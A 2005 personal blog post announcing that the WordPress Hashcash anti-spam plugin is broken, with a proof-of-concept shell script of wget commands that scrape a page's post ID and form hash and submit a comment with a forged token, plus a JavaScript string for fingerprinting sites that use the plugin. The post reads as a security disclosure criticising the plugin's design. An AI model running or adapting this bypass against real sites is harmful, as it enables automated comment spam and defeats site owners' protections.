Seth Woolley's Blog

Occasional Musings

Sun Aug 7 10:03:29 2005 -- wordpress hashcash broken

wordpress hashcash broken(0)


As a proof of concept, I wrote a shell script to break hashcash.  It works on the author's own blog:

CPID="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep 'comment_post_ID' | cut -d'"' -f 14)"
MD5="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep '<form onsubmit' | cut -d"'" -f2 |
          tr -d '\n' | md5sum | cut -d' ' -f1)"
for i in 34; do  # here just change 34 to a list of guesses of what
                 # the length of ABSPATH is, 34 in this example
  wget --post-data="author=$AUTHOR&email=$EMAIL&url=$URL&comment=$COMMENT&submit=Submit+Comment&comment_post_ID=$CPID&$MD5=$(($CPID * $i))" $SITE/wp-comments-post.php

He uses javascript "obfuscation" to make it hard for people to find his installs.  Just look for this string, which isn't obfuscated on any install:

(str){var bin=Array();var mask=(1<<8)-1;for(var i=0;i<str.length*8;i+=8)bin[i>>5]|=(str.charCodeAt(i/8)&mask)<<(i%32);return bin;}

or just do this: ;)

Elliot Back thinks people can't code around his obfuscation.  It's rather trivial to defeat -- and this script can spam his site one after another with a little addition or two -- determining the length of ABSPATH for a single site doesn't take that long either, and once you have it, it's the same for all posts.  He appears to does some fancy stuff, too "per-user", but a spammer isn't going to be "a user" or bother to become one.

Of course, you can just "interpret" his javascript, too, like some spammers already can do, but that can be more effort than it's worth.

Seth Woolley's Blog webdevel security

Leave A Comment

Secret is used for editing your own comment. If subject, secret, and name all are the same as a previous comment, it will be overwritten. Turing is the name of this program (look at the Source Code link on the front page), used to see if you are human.